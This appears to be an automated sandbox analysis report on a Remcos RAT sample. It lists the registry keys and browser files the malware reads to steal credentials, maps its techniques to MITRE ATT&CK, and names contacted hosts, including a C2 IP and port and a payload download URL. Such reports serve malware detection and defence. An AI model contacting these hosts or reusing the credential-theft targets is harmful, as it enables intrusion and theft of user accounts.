              Source: wab.exe, 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: wab.exe, 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager[
              Source: wab.exe, 0000000A.00000003.216825176879.0000000006C61000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825323143.0000000006C63000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: wab.exe, 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
              Source: wab.exe, 0000000A.00000003.216795138695.0000000006C63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216795002903.0000000006C61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerviderC
              Source: logs.dat.10.drBinary or memory string: [Program Manager]
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,12_2_0041881C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Users\user\Desktop\Uundgaaelige.exeCode function: 4_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_0040330D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.dbJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\places.sqlite
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Tries to steal Mail credentials (via file registry)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: ESMTPPassword13_2_004033F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5328, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7972, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3652, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-P99HFCJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216815635235.0000000006C30000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216795183142.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216825365435.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000003.216805263947.0000000006C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 8740, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)212
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Remote Access Software              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		1
              Credentials In Files              		119
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets221
              Security Software Discovery              		SSH2
              Clipboard Data              		112
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Virtualization/Sandbox Evasion              		Cached Domain Credentials2
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1473335 Sample: Uundgaaelige.exe Startdate: 15/07/2024 Architecture: WINDOWS Score: 100 53 geoplugin.net 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Found malware configuration 2->57 59 Multi AV Scanner detection for dropped file 2->59 61 9 other signatures 2->61 9 Uundgaaelige.exe 1 33 2->9         started        signatures3 process4 file5 35 C:\Users\user\AppData\...\Dialektologi.Alt, ASCII 9->35 dropped 37 C:\Users\user\AppData\Local\...\nsDialogs.dll, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\UserInfo.dll, PE32 9->39 dropped 41 C:\Users\user\AppData\Local\...\BgImage.dll, PE32 9->41 dropped 75 Suspicious powershell command line found 9->75 13 powershell.exe 20 9->13         started        signatures6 process7 file8 43 C:\Users\user\AppData\...\Uundgaaelige.exe, PE32 13->43 dropped 45 C:\Users\...\Uundgaaelige.exe:Zone.Identifier, ASCII 13->45 dropped 77 Writes to foreign memory regions 13->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 13->79 81 Powershell drops PE file 13->81 17 wab.exe 3 16 13->17         started        22 conhost.exe 13->22         started        signatures9 process10 dnsIp11 47 172.93.222.25, 2404, 49860, 49861 WOWUS United States 17->47 49 209.90.237.48, 49859, 80 SERVERHOSH-AS-APServerhoshInternetServiceNL United States 17->49 51 geoplugin.net 178.237.33.50, 49862, 80 ATOM86-ASATOM86NL Netherlands 17->51 33 C:\ProgramData\remcos\logs.dat, data 17->33 dropped 63 Detected Remcos RAT 17->63 65 Maps a DLL or memory area into another process 17->65 67 Installs a global keyboard hook 17->67 24 wab.exe 1 17->24         started        27 wab.exe 1 17->27         started        29 wab.exe 17->29         started        31 10 other processes 17->31 file12 signatures13 process14 signatures15 69 Tries to steal Instant Messenger accounts or passwords 24->69 71 Tries to steal Mail credentials (via file / registry access) 24->71 73 Tries to harvest and steal browser information (history, passwords, etc) 31->73

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Uundgaaelige.exe5%ReversingLabs
              Uundgaaelige.exe14%VirustotalBrowse

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\BgImage.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\UserInfo.dll0%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll2%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa17F6.tmp\nsDialogs.dll0%VirustotalBrowse
              C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe5%ReversingLabs
              C:\Users\user\AppData\Roaming\raffineredes\cerous\Feltrkkeflgerne\Uundgaaelige.exe14%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              geoplugin.net1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://www.imvu.com/0%Avira URL Cloudsafe
              http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
              172.93.222.250%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png11%VirustotalBrowse
              http://geoplugin.net/json.gp.0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png410%VirustotalBrowse
              http://nuget.org/NuGet.exe0%VirustotalBrowse
              https://contoso.com/License0%Avira URL Cloudsafe
              http://www.imvu.com0%Avira URL Cloudsafe
              https://contoso.com/Icon0%VirustotalBrowse
              http://www.imvu.com0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              http://209.90.237.48/HMKcAbwpOCo117.bin0%VirustotalBrowse
              http://www.imvu.com/0%VirustotalBrowse
              https://contoso.com/License0%VirustotalBrowse
              https://contoso.com/Icon0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp.0%VirustotalBrowse
              172.93.222.252%VirustotalBrowse
              http://209.90.237.48/HMKcAbwpOCo117.bin0%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
              https://github.com/Pester/Pester0%Avira URL Cloudsafe
              http://www.apache.org/licenses/LICENSE-2.0.html40%Avira URL Cloudsafe
              http://www.nirsoft.net0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp0%Avira URL Cloudsafe
              https://www.google.com0%Avira URL Cloudsafe
              http://www.nirsoft.net0%VirustotalBrowse
              https://github.com/Pester/Pester40%Avira URL Cloudsafe
              https://github.com/Pester/Pester1%VirustotalBrowse
              http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html40%VirustotalBrowse
              http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
              http://geoplugin.net/json.gp7%VirustotalBrowse
              https://aka.ms/pscore6lB0%Avira URL Cloudsafe
              https://contoso.com/0%Avira URL Cloudsafe
              https://nuget.org/nuget.exe0%Avira URL Cloudsafe
              https://github.com/Pester/Pester40%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              http://www.imvu.com/Xr=0%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
              https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
              https://login.yahoo.com/config/login0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%Avira URL Cloudsafe
              https://aka.ms/pscore6lB0%VirustotalBrowse
              http://www.imvu.com/Pn0%Avira URL Cloudsafe
              https://nuget.org/nuget.exe0%VirustotalBrowse
              https://www.google.com/accounts/servicelogin0%VirustotalBrowse
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://login.yahoo.com/config/login0%VirustotalBrowse
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%Avira URL Cloudsafe
              http://www.nirsoft.net/0%VirustotalBrowse
              http://www.ebuddy.com0%Avira URL Cloudsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%VirustotalBrowse
              http://www.ebuddy.com0%VirustotalBrowse
              https://contoso.com/0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              172.93.222.25true
              • 2%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://209.90.237.48/HMKcAbwpOCo117.binfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gpfalse
              • 7%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://pesterbdd.com/images/Pester.png4powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 10%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.comrwab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 11%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.com/wab.exe, 00000012.00000002.216849181328.0000000002B7C000.00000004.00000010.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://geoplugin.net/json.gp.wab.exe, 0000000A.00000003.216795183142.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216805263947.0000000006C3F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.216825365435.0000000006C3F000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Licensepowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.comwab.exe, wab.exe, 0000000E.00000002.216328189876.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216849855991.000000000350D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217152613364.00000000034BD000.00000004.00000020.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://contoso.com/Iconpowershell.exe, 00000007.00000002.216292884259.0000000005F8F000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.nirsoft.netwab.exe, 0000000C.00000002.216343254639.00000000027E4000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.216862177214.0000000002A94000.00000004.00000010.00020000.00000000.sdmp, wab.exe, 00000013.00000002.217168571301.0000000002B24000.00000004.00000010.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://nsis.sf.net/NSIS_ErrorErrorUundgaaelige.exe, Uundgaaelige.exe.7.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.apache.org/licenses/LICENSE-2.0.html4powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://github.com/Pester/Pesterpowershell.exe, 00000007.00000002.216295020300.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.216288846699.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
              • 1%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000E.00000002.216327200289.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000012.00000002.216848985891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.217151779089.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
